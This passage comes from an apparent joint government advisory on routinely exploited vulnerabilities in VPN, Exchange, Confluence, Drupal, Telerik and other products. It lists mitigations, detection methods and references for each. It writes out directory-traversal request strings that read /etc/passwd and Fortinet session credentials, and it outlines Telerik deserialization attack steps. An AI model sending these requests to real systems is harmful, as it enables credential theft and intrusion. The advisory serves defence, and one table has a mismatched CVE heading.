fixes for CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)\n * [National Institute for Standards and Technology (NIST) National Vulnerability Database (NVD): Vulnerability Detail CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * [Tripwire Vulnerability and Exposure Research Team (VERT) Article: Citrix NetScaler CVE-2019-19781: What You Need to Know](<https://www.tripwire.com/state-of-security/vert/citrix-netscaler-cve-2019-19781-what-you-need-to-know/>)\n * [National Security Agency Cybersecurity Advisory: Critical Vulnerability In Citrix Application Delivery Controller (ADC) And Citrix Gateway](<https://media.defense.gov/2020/Jan/10/2002233132/-1/-1/0/CSA%20FOR%20CITRIXADCANDCITRIXGATEWAY_20200109.PDF>)\n * [CISA Alert: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * [NCSC Alert: Actors Exploiting Citrix Products Vulnerability](<https://www.ncsc.gov.uk/news/citrix-alert>)\n * [CISA-NCSC Joint Cybersecurity Advisory: COVID-19 Exploited by Malicious Cyber Actors](<https://us-cert.cisa.gov/ncas/alerts/aa20-099a>)\n * [CISA Alert: Critical Vulnerability in Citrix Application Delivery Controller, Gateway, and SD-WAN WANOP](<https://us-cert.cisa.gov/ncas/alerts/aa20-020a>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian Foreign Intelligence Service (SVR) Cyber Operations: Trends and Best Practices for Network Defenders ](<https://www.ic3.gov/Media/News/2021/210426.pdf>)\n * [DoJ: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>)\n * [GitHub: nsacyber / Mitigating Web Shells](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_Table 3: CVE 2019-11510 Vulnerability Details_\n\nPulse Secure Connect VPN (CVE 2019-11510) \n--- \n \n_**Vulnerability Description**_ \nPulse Secure Connect is vulnerable to unauthenticated arbitrary file disclosure. An attacker can exploit this vulnerability to gain access to administrative credentials. \n\n| \n\n**CVSS 3.0**\n\nCritical \n \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nImproper access controls allow a directory traversal that an attacker can exploit to read the contents of system files. For example, the attacker could use a string such as `https://sslvpn.insecure-org.com/dana-na/../dana/html5/acc/guacmole/../../../../../../etc/passwd?/dana/html5/guacamole/` to obtain the local password file from the system. The attacker can also obtain admin session data and replay session tokens in the browser. Once compromised, an attacker can run arbitrary scripts on any host that connects to the VPN. This could lead to anyone connecting to the VPN as a potential target to compromise. \n\n_Multiple malware campaigns have taken advantage of this vulnerability, most notably REvil/Sodinokibi ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n \n \n_**Recommended Mitigations**_\n\n * Upgrade to the latest Pulse Secure VPN.\n * Stay alert to any scheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read local system files. \n**_Detection Methods_**\n\n * CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisagov/check-your-pulse.\n * Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019-11510.nse #1708. \n \n_**Vulnerable Technologies and Versions**_ \nPulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * [CISA Alert: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>)\n * [Pulse Security Advisory: SA44101 \u2013 2019-04: Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>)\n * [GitHub: cisagov / Check Your Pulse](<https://github.com/cisagov/check-your-pulse>)\n * [CISA Analysis Report: Federal Agency Compromised by Malicious Cyber Actor](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-268a>)\n * [CISA Alert: Exploitation of Pulse Connect Secure Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa21-110a>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [DoJ Press Release: Seven International Cyber Defendants, Including \u201cApt41\u201d Actors, Charged in Connection with Computer Intrusion Campaigns Against More Than 100 Victims Globally](<https://www.justice.gov/opa/pr/seven-international-cyber-defendants-including-apt41-actors-charged-connection-computer>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: Indicators Associated with Netwalker Ransomware](<https://www.ic3.gov/Media/News/2020/200929-2.pdf>)\n * [FBI FLASH: Indictment of China-Based Cyber Actors Associated with APT 41 for Intrusion Activities](<https://www.ic3.gov/Media/News/2020/201103-2.pdf>) \n \n_Table 4: CVE 2018-13379 Vulnerability Details_\n\n**Fortinet FortioOS Secure Socket Layer VPN (CVE 2018-13379)** \n--- \n \n**_Vulnerability Description_** \nFortinet Secure Sockets Layer (SSL) VPN is vulnerable to unauthenticated directory traversal, which allows attackers to gain access to the `sslvpn_websession` file. An attacker is then able to exact clear-text usernames and passwords. \n\n| \n\n**_CVSS 3.0_**\n\nCritical \n \n \n**_Vulnerability Discussion, IOCs, and Malware Campaigns_** \nWeakness in user access controls and web application directory structure allows attackers to read system files without authentication. Attackers are able to perform a `HTTP GET request http://$SSLVPNTARGET?lang=/../../../..//////////dev/cmdb/sslvpn_websession`. This results the server responding with unprintable/hex characters alongside cleartext credential information. \n\n_Multiple malware campaigns have taken advantage of this vulnerability. The most notable being Cring ransomware (also known as Crypt3, Ghost, Phantom, and Vjszy1lo). _\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n \n \n**_Recommended Mitigations_**\n\n * Upgrade to the latest Fortinet SSL VPN. \n * Monitor for alerts to any unscheduled tasks or unknown files/executables. \n * Create detection/protection mechanisms that respond on directory traversal (`/../../../`) attempts to read the `sslvpn_websessions` file. \n**_Detection Methods_**\n\n * Nmap developed a script that can be used with the port scanning engine: Fortinet SSL VPN CVE-2018-13379 vuln scanner #1709. \n \n**_Vulnerable Technologies and Versions_** \nFortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7, and 5.4.6 to 5.4.12 are vulnerable. \n \n_**References**_\n\n * [FortiOS System File Leak Through SSL VPN via Specialty Crafted HTTP Resource Requests](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n * [Github: Fortinet Ssl Vpn Cve-2018-13379 Vuln Scanner #1709](<https://github.com/nmap/nmap/pull/1709>)\n * [Fortinet Blog: Update Regarding CVE-2018-13379](<https://www.fortinet.com/blog/psirt-blogs/update-regarding-cve-2018-13379>)\n * [NIST NVD Vulnerability Detail: CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)\n * [FBI-CISA Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [FBI-CISA Joint Cybersecurity Advisory: APT Actors Exploit Vulnerabilities to Gain Initial Access for Future Attacks](<https://www.ic3.gov/Media/News/2021/210402.pdf>)\n * [NCSC Alert: Vulnerabilities Exploited in VPN Products Used Worldwide](<https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities>)\n * [FBI News: Russian Foreign Intelligence Service Exploiting Five Publicly Known Vulnerabilities to Compromise U.S. and Allied Networks](<https://www.fbi.gov/news/pressrel/press-releases/russian-foreign-intelligence-service-exploiting-five-publicly-known-vulnerabilities-to-compromise-us-and-allied-networks>)\n * [FBI FLASH: APT Actors Exploiting Fortinet Vulnerabilities to Gain Access for Malicious Activity](<https://www.ic3.gov/Media/News/2021/210527.pdf>) \n \n_Table 5: CVE-2020-5902 Vulnerability Details_\n\nF5 Big IP Traffic Management User Interface (CVE-2020-5902) \n--- \n \n_**Vulnerability Description**_ \nThe Traffic Management User Interface (TMUI), also referred to as the Configuration Utility, has an RCE vulnerability in undisclosed pages. \n\n| \n\n_**CVSS 3.0**_ \nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_ \nThis vulnerability allows for unauthenticated attackers, or authenticated users, with network access to the Configuration Utility (through the BIG-IP management port and/or self IPs) to execute arbitrary system commands, create or delete files, disable services, and execute arbitrary Java code. This vulnerability may result in complete system compromise. The BIG-IP system in Appliance mode is also vulnerable. This issue is not exposed on the data plane; only the control plane is affected. \n\n| _**Fix**_ \n[Upgrade to Secure Versions Available](<https://support.f5.com/csp/article/K52145254>) \n \n \n_**Recommended Mitigations**_ \nDownload and install a fixed software version of the software from a vendor approved resource. If it is not possible to update quickly, restrict access via the following actions.\n\n * Address unauthenticated and authenticated attackers on self IPs by blocking all access.\n * Address unauthenticated attackers on management interface by restricting access. \n**_Detection Methods_**\n\n * F5 developed a free detection tool for this vulnerability: [f5devcentral / cve-2020-5902-ioc-bigip-checker](<https://github.com/f5devcentral/cve-2020-5902-ioc-bigip-checker/>). \n * Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_ \nBIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT) 15.1.0, 15.0.0-15.0.1, 14.1.0-14.1.2, 13.1.0-13.1.3, 12.1.0-12.1.5, and 11.6.1-11.6.5 are vulnerable. \n \n**_References_**\n\n * [F5 Article: TMUI RCE Vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n * [NIST NVD Vulnerability Detail: CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n * [CISA Alert: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>)\n * [MITRE CVE Record: CVE-2020-5902](<https://vulners.com/cve/CVE-2020-5902>) \n \n_Table 6: CVE-2020-15505 Vulnerability Details_\n\nMobileIron Core & Connector (CVE-2020-15505) \n--- \n \n_**Vulnerability Description**_\n\nMobileIron Core & Connector, Sentry, and Monitoring and Reporting Database (RDB) software are vulnerable to RCE via unspecified vectors.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nCVE-2020-15505 is an RCE vulnerability in MobileIron Core & Connector versions 10.3 and earlier. This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\nMultiple APTs have been observed exploiting this vulnerability to gain unauthorized access.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * None. Manually check your software version to see if it is susceptible to this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\nMobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0, and 10.6.0.0; Sentry versions 9.7.2 and earlier and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier are vulnerable. \n \n_**References**_\n\n * [Ivanti Blog: MobileIron Security Updates Available](<https://www.ivanti.com/blog/mobileiron-security-updates-available>)\n * [CISA-FBI Joint Cybersecurity Advisory: APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n * [NIST NVD Vulnerability Detail: CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * [MITRE CVE Record: CVE-2020-15505](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-15505>)\n * [NSA Cybersecurity Advisory: Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>) \n \n_Table 7: CVE-2020-0688 Vulnerability Details_\n\nMicrosoft Exchange Memory Corruption (CVE-2020-0688) \n--- \n \n_**Vulnerability Description**_\n\nAn RCE vulnerability exists in Microsoft Exchange software when the software fails to properly handle objects in memory.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \nVulnerability Discussion, IOCs, and Malware Campaigns \nCVE-2020-0688 exists in the Microsoft Exchange Server when the server fails to properly create unique keys at install time. An authenticated user with knowledge of the validation key and a mailbox may pass arbitrary objects for deserialization by the web application that runs as `SYSTEM`. The security update addresses the vulnerability by correcting how Microsoft Exchange creates the keys during install. \n\nA nation-state _APT actor has been observed exploiting this vulnerability to conduct widespread, distributed, and anonymized brute force access attempts against hundreds of government and private sector targets worldwide._\n\n| \n\n_**Fix**_\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor approved resource. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2020-0688 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF%20>) and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells>. \n \n_**Vulnerable Technologies and Versions**_\n\nMicrosoft Exchange Server 2019 Cumulative Update 3 and 4, 2016 Cumulative Update 14 and 15, 2013 Cumulative Update 23, and 2010 Service Pack 3 Update Rollup 30 are vulnerable. \n \n_**References**_\n\n * [Microsoft Security Update Guide: CVE-2020-0688](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0688>)\n * [NIST NVD Vulnerability Detail: CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)\n * [Microsoft Security Update: Description of the security update for Microsoft Exchange Server 2019 and 2016: February 11, 2020](<https://support.microsoft.com/en-us/topic/description-of-the-security-update-for-microsoft-exchange-server-2019-and-2016-february-11-2020-94ac1ebb-fb8a-b536-9240-a1cab0fd1c9f>)\n * [CISA-FBI Joint Cybersecurity Advisory: Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets](<https://us-cert.cisa.gov/ncas/alerts/aa20-296a>)\n * [ACSC Alert: Active Exploitation of Vulnerability in Microsoft Internet Information Services](<https://www.cyber.gov.au/acsc/view-all-content/alerts/active-exploitation-vulnerability-microsoft-internet-information-services>)\n * [NSA-CISA-FBI-NCSC Cybersecurity Advisory: Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments](<https://media.defense.gov/2021/Jul/01/2002753896/-1/-1/0/CSA_GRU_GLOBAL_BRUTE_FORCE_CAMPAIGN_UOO158036-21.PDF>) \n \n_Table 8: CVE-2019-3396 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Confluence Server and Data Center Widget Connector is vulnerable to a server-side template injection attack.\n\n| \n\n_**CVSS**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nConfluence Server and Data Center versions released before June 18, 2018, are vulnerable to this issue. A remote attacker is able to exploit a server-side request forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance. A successful attack is able to exploit this issue to achieve server-side template injection, path traversal, and RCE on vulnerable systems.\n\n_Multiple malware campaigns have taken advantage of this vulnerability; the most notable being GandCrab ransomware._\n\n| \n\n_**Fix**_\n\n[Patch Available](<Patch%20Available>) \n \n_**Recommended Mitigations**_\n\n * Download and install a fixed software version of the software from a vendor-approved resource. \n \n_**Detection Methods**_\n\n * Manually check the software version to see if it is susceptible to this vulnerability.\n\n * CVE-2019-3396 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at <https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF> and signatures at [https://github.com/nsacyber/Mitigating-Web-Shells.](<https://github.com/nsacyber/Mitigating-Web-Shells>) \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2019-3396](<https://nvd.nist.gov/vuln/detail/CVE-2019-3396>)\n * [MITRE CVE Record: CVE-2019-3396](<https://vulners.com/cve/CVE-2019-3396>)\n * [Confluence Security Advisory: Confluence Data Center and Server 7.12](<https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html>)\n * [Confluence Server and Data Center CONFSERVER-57974: Remote Code Execution via Widget Connector Macro - CVE-2019-3396](<https://jira.atlassian.com/browse/CONFSERVER-57974>)\n * [TrendMicro Research Article: CVE-2019-3396: Exploiting the Confluence Vulnerability](<https://www.trendmicro.com/en_us/research/19/e/cve-2019-3396-redux-confluence-vulnerability-exploited-to-deliver-cryptocurrency-miner-with-rootkit.html>) \n \n_Table 9: CVE 2017-11882 Vulnerability Details_\n\nMicrosoft Office Memory Corruption (CVE 2017-11882) \n--- \n \n_**Vulnerability Description**_\n\nMicrosoft Office is prone to a memory corruption vulnerability allowing an attacker to run arbitrary code, in the context of the current user, by failing to properly handle objects in memory. It is also known as the \"Microsoft Office Memory Corruption Vulnerability.\" \n\nCyber actors continued to exploit this four-year-old vulnerability in Microsoft Office that the U.S. Government publicly assessed last year was the most frequently targeted. Cyber actors most likely continue to exploit this vulnerability because Microsoft Office use is ubiquitous worldwide, the vulnerability is ideal for phasing campaigns, and it enables RCE on vulnerable systems.\n\n| \n\n_**CVSS 3.0**_\n\nHigh \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nMicrosoft Equation Editor, a component of Microsoft Office, contains a stack buffer overflow vulnerability that enables RCE on a vulnerable system. The component was compiled on November 9, 2000. Without any further recompilation, it was used in all currently supported versions of Microsoft Office. Microsoft Equation Editor is an out-of-process COM server that is hosted by `eqnedt32.exe`, meaning it runs as its own process and can accept commands from other processes.\n\nData execution prevention (DEP) and address space layout randomization (ASLR) should protect against such attacks. However, because of the manner in which `eqnedt32.exe` was linked, it will not use these features, subsequently allowing code execution. Being an out-of-process COM server, protections specific to Microsoft Office such as EMET and Windows Defender Exploit Guard are not applicable to `eqnedt32.exe`, unless applied system-wide. This provides the attacker with an avenue to lure targets into opening specially crafted documents, resulting in the ability to execute an embedded attacker commands.\n\n_Multiple cyber espionage campaigns have taken advantage of this vulnerability. CISA has noted CVE-2017-11882 being exploited to [deliver LokiBot malware](<https://us-cert.cisa.gov/ncas/alerts/aa20-266a>)._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>) \n \n_**Recommended Mitigations**_\n\n * To remediate this issue, administrators should deploy Microsoft\u2019s patch for this vulnerability: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>.\n * Those who cannot deploy the patch should consider disabling the Equation Editor as discussed in [Microsoft Knowledge Base Article 4055535](<https://support.microsoft.com/en-us/topic/how-to-disable-equation-editor-3-0-7e000f58-cbf4-e805-b4b1-fde0243c9a92>). \n \n_**Detection Methods**_\n\n * Microsoft Defender Antivirus, Windows Defender, Microsoft Security Essentials, and the Microsoft Safety Scanner will all detect and patch this vulnerability. \n \n_**Vulnerable Technologies and Versions**_\n\n * Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 are vulnerable. \n \n_**References**_\n\n * [NIST NVD Vulnerability Detail: CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n * [CISA Malware Analysis Report: MAR-10211350-1.v2](<https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133e>)\n * [Palo Alto Networks Analysis: Analysis of CVE-2017-11882 Exploit in the Wild](<https://unit42.paloaltonetworks.com/unit42-analysis-of-cve-2017-11882-exploit-in-the-wild/>)\n * [CERT Coordination Center Vulnerability Note: Microsoft Office Equation Editor stack buffer overflow](<https://www.kb.cert.org/vuls/id/421280>) \n \n_Table 10: CVE 2019-11580 Vulnerability Details_\n\nAtlassian Crowd and Crowd Data Center Remote Code Execution (CVE 2019-11580) \n--- \n \n_**Vulnerability Description**_\n\nAtlassian Crowd and Crowd Data Center had the `pdkinstall` development plugin incorrectly enabled in release builds.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAttackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits RCE on systems running a vulnerable version of Crowd or Crowd Data Center.\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_**Recommended Mitigations**_\n\n * Atlassian recommends customers running a version of Crowd below version 3.3.0 to upgrade to version 3.2.8. For customers running a version above or equal to 3.3.0, Atlassian recommends upgrading to the latest version.\n * Released Crowd and Crowd Data Center version 3.4.4 contains a fix for this issue and is available at <https://www.atlassian.com/software/crowd/download>.\n * Released Crowd and Crowd Data Center versions 3.0.5, 3.1.6, 3.2.8, and 3.3.5 contain a fix for this issue and are available at <https://www.atlassian.com/software/crowd/download-archive>. \n \n_**Detection Methods**_\n\n * Manually check your software version to see if it is susceptible to this vulnerability.\n * CVE-2019-11580 is commonly exploited to install web shell malware. NSA provides guidance on detecting and preventing web shell malware at [https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PD](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)F and signatures at <https://github.com/nsacyber/Mitigating-Web-Shells> \n \n_**Vulnerable Technologies and Versions**_\n\nAll versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. \n \n**_References_**\n\n * [NIST NVD Vulnerability Detail: CVE-2019-11580](<https://nvd.nist.gov/vuln/detail/CVE-2019-11580>)\n * [Crowd CWD-5388: Crowd \u2013 pdkinstall Development Plugin Incorrectly Enabled \u2013 CVE-2019-11580](<https://jira.atlassian.com/browse/CWD-5388>)\n * [Crowd Security Advisory: Crowd Data Center and Server 4.3](<https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html>) \n \n_Table 11: CVE 2018-7600 Vulnerability Details_\n\nDrupal Core Multiple Remote Code Execution (CVE 2018-7600) \n--- \n \n_**Vulnerability Description**_\n\nDrupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allow remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.\n\n| \n\n_**CVSS 3.0**_\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nAn RCE vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised. Failed exploit attempts may result in a denial-of-service condition. A remote user can send specially crafted data to trigger a flaw in the processing of renderable arrays in the Form Application Programming Interface, or API, and cause the target system to render the user-supplied data and execute arbitrary code on the target system.\n\n_Malware campaigns include the Muhstik botnet and XMRig Monero Cryptocurrency mining._\n\n| \n\n**_Fix_**\n\n[Patch Available](<https://www.drupal.org/sa-core-2018-002>) \n \n_**Recommended Mitigations**_\n\n * Upgrade to the most recent version of Drupal 7 or 8 core. If running 7.x, upgrade to Drupal 7.58. If running 8.5.x, upgrade to Drupal 8.5.1. \n \n_**Detection Methods**_\n\n * Dan Sharvit developed a tool to check for the CVE-2018-7600 vulnerability on several URLs: [https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py.](<https://github.com/sl4cky/CVE-2018-7600-Masschecker/blob/master/Drupalgeddon-mass.py>) \n \n_**Vulnerable Technologies and Versions**_\n\n * Drupal versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 are affected. \n \n_**References**_\n\n * [Drupal Security Advisory: Drupal Core - Highly Critical - Remote Code Execution - SA-CORE-2018-002](<https://www.drupal.org/sa-core-2018-002>)\n * [NIST NVD Vulnerability Detail: CVE-2018-7600](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>)\n * [Drupal Groups: FAQ about SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>) \n \n_Table 12: CVE 2019-18935 Vulnerability Details_\n\nTelerik UI for ASP.NET AJAX Insecure Deserialization (CVE 2019-18935) \n--- \n \n_**Vulnerability Description**_\n\nTelerik User Interface (UI) for ASP.NET does not properly filter serialized input for malicious content. Versions prior to R1 2020 (2020.1.114) are susceptible to remote code execution attacks on affected web servers due to a deserialization vulnerability.\n\n| \n\n**_CVS 3.0_**\n\nCritical \n \n_**Vulnerability Discussion, IOCs, and Malware Campaigns**_\n\nThe Telerik UI does not properly sanitize serialized data inputs from the user. This vulnerability leads to the application being vulnerable to RCE attacks that may lead to a full system compromise. A vulnerable `HTTP POST` parameter `rauPostData` makes use of a vulnerable function/object `AsyncUploadHandler`. The object/function uses the `JavaScriptSerializer.Deserialize()` method, which not not properly sanitize the serialized data during the deserialization process. This issue is attacked by:\n\n 1. Determining the vulnerable function is available/registered: ` http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau`,\n 2. Determining if the version running is vulnerable by querying the UI, and\n 3. Creating an object (e.g., malicious mixed-mode DLL with native OS commands or Reverse Shell) and uploading the object via rauPostData parameter along with the proper encryption key.\n\n_There were two malware campaigns associated with this vulnerability:_\n\n * _Netwalker Ransomware and_\n * _Blue Mockbird Monero Cryptocurrency-mining._\n| \n\n_**Fix**_\n\n[Patch Available](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>) \n \n_**Recommended Mitigations**_\n\n * Update to the most recent version of Telerik UI for ASP.NET AJAX (at least 2020.1.114 or later). \n \n_**Detection Methods**_\n\n * ACSC has an example PowerShell script that can be used to identify vulnerable Telerik UI DLLs on Windows web server hosts.\n * Vulnerable hosts should be reviewed for evidence of exploitation. Indicators of exploitation can be found in IIS HTTP request logs and within the Application Windows event log. Details of the above PowerShell script and exploitation detection recommendations are available in [ACSC Advisory 2020-004](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>).\n * Exploitation of this and previous Telerik UI vulnerabilities commonly resulted in the installation of web shell malware. NSA provides guidance on [detecting and preventing web shell malware](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>). \n \n**_Vulnerable Technologies and Versions_**\n\nTelerik UI for ASP.NET AJAX versions prior to R1 2020 (2020.1.114) are affected. \n \n**_References_**\n\n * [Telerik UI for ASP.NET AJAX security advisory \u2013 Allows JavaScriptSerializer Deserialization](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>)\n * [NIST NVD Vulnerability Detail: CVE-2019-18935](<https://nvd.nist.gov/vuln/detail/CVE-2019-18935>)\n * [ACSC Advisory 2020-004: Remote Code Execution Vulnerability Being Actively Exploited in Vulnerable Versions of Telerik UI by Sophisticated Actors](<https://www.cyber.gov.au/acsc/view-all-content/advisories/advisory-2020-004-remote-code-execution-vulnerability-being-actively-exploited-vulnerable-versions-telerik-ui-sophisticated-actors>)\n * [Bishop Fox \u2013 CVE-2019-18935: 